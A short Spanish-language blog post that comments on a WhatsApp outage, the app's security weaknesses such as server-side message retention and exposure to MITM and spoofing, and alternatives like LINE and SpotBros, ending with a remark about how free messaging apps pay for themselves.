WhatsApp vuelve a caerse y no deja conectarse a sus usuarios. Este membrete fue de una noticia que aconteció hace ya unas semanas. Sin embargo, ha vuelto a pasar.El portal RedesZone publico un buen análisis sobre la fiabilidad de Whatsapp, y no deberíamos perdernos la conclusión al respecto. Al final la conclusión siempre es la misma. La pasta. Whatsapp, sigue teniendo problemas serios de seguridad, a pesar de que si que han cifrado los mensajes, los mismos siguen permaneciendo en sus servidores hasta la eternidad, sigue siendo muy facil hacerle cualquier tipo de ataque (lease MITM, spoofing...) y en caso de sustracción del terminal, se puede liar una muy buena. Pero seamos objetivos, ¿que otra herramienta podemos usar? Se esta poniendo muy de moda desde el mundo oriental LINE, pero claro, con la batería de los smartphones actuales, no es una alternativa real, ya que literalmente se bebe la batería, y no hay móviles que lleguen a los 4000mAH. El amigo Yago, de SecuritybyDefault me recomendo el uso de SpotBross, una aplicaciones buena y son tonterías, con una política de seguridad y respuesta de incidentes muy buena. Sin embargo, desde las ultimas versiones, se esta convirtiendo en algo demasiado social, para mi. El problema, el de siempre. La pasta. Para mantener el ritmo, hacen falta recursos, y estamos hablando de aplicaciones gratuitas (en principio) y no todas las apps pueden o quieren introducir en publicidad, que podria ser su sustento. Creo que he visto un par de chavalillos con el mono de Whatsapp. Les voy a preguntar...